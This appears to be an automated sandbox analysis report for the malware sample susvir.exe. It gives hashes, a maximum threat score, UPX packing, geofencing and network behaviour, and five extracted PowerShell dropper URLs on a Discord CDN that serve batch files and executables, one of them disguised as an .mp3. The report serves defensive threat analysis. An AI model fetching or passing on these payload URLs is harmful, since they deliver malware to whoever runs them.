Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    susvir.exe

  • Size

    66KB

  • Sample

    230206-rgpf8aec37

  • MD5

    28df9a92d49e842d38a1714f7a4066f0

  • SHA1

    e747b57bfda77395a30245bb7573c4a1025e3046

  • SHA256

    d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72

  • SHA512

    59b027ac5d29d763888b437339a6484b367fb055be2c182146c49c87ce0a64a8ef21007db41bae6bcf2ebbc434695bdaafc083f3d6878eaf1a7cb476a423652f

  • SSDEEP

    1536:ipfEKNCj6VoJl9Go5K7s4Nu3Am8ryEpdg0IP6nouy8:iVZ/VGS7rN+AFry50Iaout

Score
10/10
upx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe

Targets

    • Target

      susvir.exe

    • Size

      66KB

    • MD5

      28df9a92d49e842d38a1714f7a4066f0

    • SHA1

      e747b57bfda77395a30245bb7573c4a1025e3046

    • SHA256

      d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72

    • SHA512

      59b027ac5d29d763888b437339a6484b367fb055be2c182146c49c87ce0a64a8ef21007db41bae6bcf2ebbc434695bdaafc083f3d6878eaf1a7cb476a423652f

    • SSDEEP

      1536:ipfEKNCj6VoJl9Go5K7s4Nu3Am8ryEpdg0IP6nouy8:iVZ/VGS7rN+AFry50Iaout

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

MITRE ATT&CK Enterprise v6

Tasks